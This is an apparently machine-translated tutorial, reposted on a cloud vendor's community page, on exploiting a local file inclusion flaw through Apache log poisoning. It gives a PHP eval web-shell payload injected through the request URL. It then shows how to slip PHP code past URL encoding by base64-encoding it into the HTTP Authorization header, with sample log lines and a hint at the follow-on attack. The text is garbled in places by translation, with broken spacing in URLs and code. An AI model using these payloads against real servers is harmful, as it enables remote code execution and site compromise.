Apache Log bypass URL encoding method

Source: Internet
Author: User
Tags apache log

Scenario: when we have LFI vul, the most common use is to construct malicious logs to exploit the vulnerability. Some problems may occur in this process. The following describes the problems and solutions.
Topic: Apache Log bypass URL encoding method
First, briefly introduce Apache logs. Apache logs are stored in the logs folder under the installation directory by default, mainly including access logs and error logs. In Windows, these two log files are access. log and error. log. in Linux, they are access_log and error_log.
(Note: I have set up a test environment on a local virtual machine with the IP address 192.168.5.66)
Access. log/access_log records all access activities to the Web server. The format is as follows:

192.168.5. 66--[21/Apr/2014: 10: 21: 04 + 0800] "GET/test. php? Id = 1 HTTP/1.1 "200 2876


1. remote Host, 2. blank (E-mail), 3. blank (login name), 4. request time, 5. method + resource + protocol, 6. status Code, 7. sent bytes
Based on this feature, we can construct a malicious access record. The payload is as follows:


Http: // 192.168.5. 66/test. php? Id = <? Php eval ($ _ POST [test]);?>


Enter the preceding address in the browser to access the log to survive a record:

192.168.5. 66--[21/Apr/2014: 11: 21: 04 + 0800] "GET/test. php? Id = % 3C? Php % 20 eval ($ _ POST [test]);? % 3E https/1.1 "200 2956


In this log
Id = % 3C? Php % 20 eval ($ _ POST [test]);? % 3E
 


This Code corresponds
Id = <? Php eval ($ _ POST [test]);?>


Visible characters '<', '', and '<' Are URL encoded as '% 3C', '% 20', and' % 3E '. Therefore, we need to bypass the URL encoding to write the correct PHP code into the log.
How URL encoding is bypassed:
The Authorization field in the http header is used to send information for http auth authentication. The value format is "Basic base64 (User: Pass )". Accordingly, we re-construct the payload as follows:
URL: http: // 192.168.5.115/test. php
Add Authorization = Basic PD9waHAgcGhwaW5mbygpPz46MTIzNTY = to HTTP HEAD
Note: PD9waHAgcGhwaW5mbygpPz46MTIzNTY = is base64 (<? Php phpinfo ()?> : 12356)
This method can be used to successfully bypass URL encoding and write the correct PHP code into the log as follows:
192.168.5.115-<? Php phpinfo ()?> [21/Apr/2014: 11: 21: 04 + 0800] "GET/test. php HTTP/1.1" 200 2735



Demo:
Visit the website root directory:

View access logs:

Add the Authorization field of the http header:







Check the access log to determine whether the Authorization field value is successfully written.Log in

In this way, the PHP code can be successfully written into the Apache log by bypassing URL encoding. As for the attack method after the PHP code is successfully written, we will not describe it here. You know, hey.
 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.